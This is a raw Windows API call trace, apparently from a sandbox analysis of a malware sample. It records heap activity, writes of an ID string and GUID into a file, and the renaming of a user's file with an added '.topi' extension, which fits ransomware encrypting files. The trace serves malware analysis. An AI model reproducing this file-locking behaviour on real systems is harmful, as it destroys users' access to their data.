[0096.275] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.275] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.275] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.275] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.275] GetCurrentThreadId () returned 0x8c4 [0096.275] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.275] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.275] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0096.275] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.276] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.276] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.276] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0096.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.276] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0096.276] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98a0 [0096.277] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0096.277] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98b8 [0096.277] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.277] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9888 [0096.277] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.277] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0096.277] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.278] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d98d0 [0096.278] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e68 [0096.278] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0096.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0096.278] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.278] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.278] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98a0 | out: hHeap=0x680000) returned 1 [0096.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98a0 [0096.278] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.278] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0096.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98a0 | out: hHeap=0x680000) returned 1 [0096.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0096.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0096.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98d0 | out: hHeap=0x680000) returned 1 [0096.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0096.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98b8 | out: hHeap=0x680000) returned 1 [0096.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9888 | out: hHeap=0x680000) returned 1 [0096.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9870 | out: hHeap=0x680000) returned 1 [0096.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a026c0 | out: hHeap=0x680000) returned 1 [0096.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.281] WriteFile (in: hFile=0x6a8, lpBuffer=0x3199338*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x3199338*, lpNumberOfBytesWritten=0x9ccfb14*=0xdd, lpOverlapped=0x0) returned 1 [0096.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3199338 | out: hHeap=0x680000) returned 1 [0096.281] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xe2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.281] WriteFile (in: hFile=0x6a8, lpBuffer=0x99def60*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99def60*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.281] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.281] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0096.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.281] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0096.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.281] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0096.281] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.281] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.282] CloseHandle (hObject=0x6a8) returned 1 [0096.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4090 [0096.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8a0) returned 0x31cf750 [0096.296] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4090 | out: hHeap=0x680000) returned 1 [0096.296] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.topi")) returned 1 [0096.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.297] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3ff8 | out: hHeap=0x680000) returned 1 [0096.299] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0096.299] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0096.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0096.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.299] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0096.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.299] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0096.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0096.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.304] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.305] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.306] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.306] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.306] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.306] RtlAllocateHeap 